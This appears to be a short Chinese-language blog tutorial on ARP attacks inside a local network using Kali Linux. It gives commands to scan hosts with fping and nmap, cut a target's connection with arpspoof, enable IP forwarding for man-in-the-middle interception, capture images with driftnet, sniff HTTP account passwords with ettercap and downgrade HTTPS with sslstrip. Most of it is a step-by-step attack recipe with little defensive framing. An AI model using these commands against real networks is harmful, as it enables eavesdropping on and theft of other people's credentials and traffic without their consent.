局域网内ARP攻击

原理

参考:https://zhuanlan.zhihu.com/p/28818627

https://baijiahao.baidu.com/s?id=1633211639846187414&wfr=spider&for=pc

https://www.anquanke.com/post/id/151762

配置网络

使用kali攻击主机

将虚拟机kali网络连接模式设置为桥接

打开配置文件

1
vi /etc/network/interfaces

修改为以下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0 #网卡1名称
iface eth0 inet dhcp #设置为动态主机设置协议

auto eth1 #网卡2名称
iface eth1 inet dhcp

重启网络服务

1
sevice networking restart

ARP断网攻击

1
fping -asg **.**.**.0/24
1
nmap -sP **.**.**.0/24

扫描内网主机

1
arpspoof -i 网卡名 -t   目标网关地址  目标IP地址

若出现arpspoof: couldn’t arp for host,可以尝试更换虚拟机网络连接模式或更换网卡

ARP欺骗

开启流量转发功能

1
echo 1 >> /proc/sys/net/ipv4/ip_forward

使用arpspoof

(此时ARP断网攻击会失效,需要将参数改回默认值0才能断网)

1
arpspoof -i 网卡名 -t   目标网关地址  目标IP地址

使用driftnet图片流量监控

1
driftnet -i 网卡名

1567929794725

ettercap嗅探 抓取账号密码(仅限http协议)

1
ettercap -Tq -i 网卡名

-Tq 表示文本模式、安静模式

OJ..

1
sslstrip -a -f -k

将HTTPS的协议还原为HTTP,这样应该就可以嗅探https协议的网站,但尝试了几次还没有成功。。